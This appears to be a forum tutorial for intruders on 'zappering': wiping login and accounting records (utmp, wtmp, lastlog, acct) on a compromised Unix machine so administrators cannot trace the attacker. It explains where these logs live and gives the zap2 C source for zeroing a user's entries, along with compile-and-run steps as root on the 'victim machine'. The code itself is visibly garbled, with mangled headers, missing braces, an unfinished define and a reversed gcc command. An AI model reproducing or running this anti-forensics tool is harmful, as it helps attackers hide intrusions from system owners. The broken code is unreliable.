Forum Thread: [Zappering or Cloakering] Clearing Footprints- by Mohamed Ahmed.

This is what we are going to do with a zapper, a zapper is a program that when executed on the remote machine cleans the log that is saved with everything we did on the victim machine.

If you do not clean the dirt you leave these shit, and if the root checks the logs will see your IP and everything you've done. If they catch you later do not tell me not to warn.

But where is the problem of this, and well I comment that the problem of this is that to erase what did you have to be roort.

The most important logs are:

_ UTMP - Indicates who is connected in each moment.

_ WTMP - Indicates all inputs and outputs of the victim machine indicating the tty and host.

_ LASTLOG - Saves to log indicating the exact moment in the ce konekto the user for the last time.

_ ACCT - Save all commands by users (aunke without arguments) and how we put them.

It took me almost 3 hours to figure this out so I figure that someday they will use it, if they ever enter a computer.

These logs are located in the following directories.

_ UTMP: / etc or / var / adm or / usr / adm or / usr / var / adm or / var / log

_ WTMP: / etc or / var / adm or / usr / adm or / usr / var / adm or / var / log

_ lastlog: / usr / var / adm or / usr / adm or / var / adm or / var / log

_ ACCT: / var / adm / acct (in some systems can be called pacct)

This varies from system in system.

The zappers what most do is delete the log acct, this way we are saved from being caught because they know we were inside but can not know what we did. That is why it is good to follow him with some method of anonymity that you will already know.

What I will teach you to use is zap2 to zapper that is very easy to detect if it is wanted, which does not delete the logs but leave them at 0, and also delete the acct but also leaves it in 0 so we will not have serious problems, as long as they do not send to shit in the machine and make the admin want to know who it was. It will cost you but it will not be as fasil as leaving the document number in the log.

In this tutor we are going to kill 2 birds with one stone. One is to learn to compile exploits and another to learn to execute them. Obviously this is for local use, ie you have to run it from the shell system that we want to clean.

We proceed to create the zap2.c file in this way.

root @ localhost mOhamed # cat> zap2.c

------------------------ * copy the code ----------- ---------- ----

#include <sys / types.h>

#include <stdio.h>

#include <unistd.h>

#include <sys / file.h>

#include <fcntl .h>

#include <utmp.h>

#include <pwd.h>

#include <lastlog.h>

#define WTMP_NAME "/ usr / adm / wtmp"

#define UTMP_NAME "/ etc / utmp"

#define LASTLOG_NAME "

void kill_utmp (who)

char * who;


struct utmp utmp_ent;

if ((f = open (UTMPNAME, ORDWR))> = 0) {

while (read (f, & utmpent, sizeof (utmpent))> 0)

if (! strncmp (utmpent.utname, who, strlen (who))) {

bzero ((char *) & utmpent, sizeof (utmpent));

lseek (f, - (sizeof (utmpent)), SEEKCUR);

write (f, & utmpent, sizeof (utmpent));


Close (f);



void kill_wtmp (who)

char * who;


struct utmp utmp_ent;

long pos;

pos = 1L;

if ((f = open (WTMPNAME, ORDWR)) = 0) {

while (pos! = -1L) {

lseek (f, - (long) ((sizeof (struct utmp)) pos), L_XTND);

if (read (f, & utmp_ent, sizeof (struct utmp)) <0) {

pos = -1L;

} else {

if (! strncmp (utmpent.utname, who, strlen (who))) {

bzero ((char *) & utmp_ent, sizeof (struct utmp));

lseek (f, - ((sizeof (struct utmp)) * pos), L_XTND);

write (f, & utmpent, sizeof (utmpent));

pos = -1L;

} else pos + = 1L;



Close (f);



void kill_lastlog (who)

char * who;


struct passwd * pwd;

struct lastlog newll;

if ((pwd = getpwnam (who)) = null) {

if ((f = open (LASTLOGNAME, ORDWR))> = 0) {

lseek (f, (long) pwd-> pw_uid * sizeof (struct lastlog) 0);

bzero ((char *) & newll, sizeof (newll));

write (f, (char *) & newll, sizeof (newll));

close (f);


} else printf ("% s:? \ n", who);


main (argc, argv)

int argc;

char * argv;


if (argc == 2) {

kill_lastlog (argv 1);

kill_wtmp (argv 1);

kill_utmp (argv 1);

printf ("Zap2! \ n");

} else

printf ("Done ... I already cleaned the mie * a ... hdl rulez! \ n");


-------------------------------------- term zap2 --------- - ---------

press Ctrl + z to finish

15 + Stopped cat> zap2.c

root @ localhost mOhamed #

Now compile

root @ localhost mOhamed # gcc -o zap2.c ZAP2

The compiled file (program) is going to be called zap2

and now we execute it this way.

root @ localhost mOhamed # ./zap2

Ready ... and clean the mie * a ... hdl rulez!

root @ localhost mOhamed #

As you can tell us if I work or do not want to clarify that it can be used in the following ways.

root @ localhost mOhamed # ./zap2 username

or just

root @ localhost mOhamed # ./zap2

That will delete the user's logs that we are using at the moment.


*Here more zappers

2)cloak2.c <Very good and famous

3)vanish. c

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active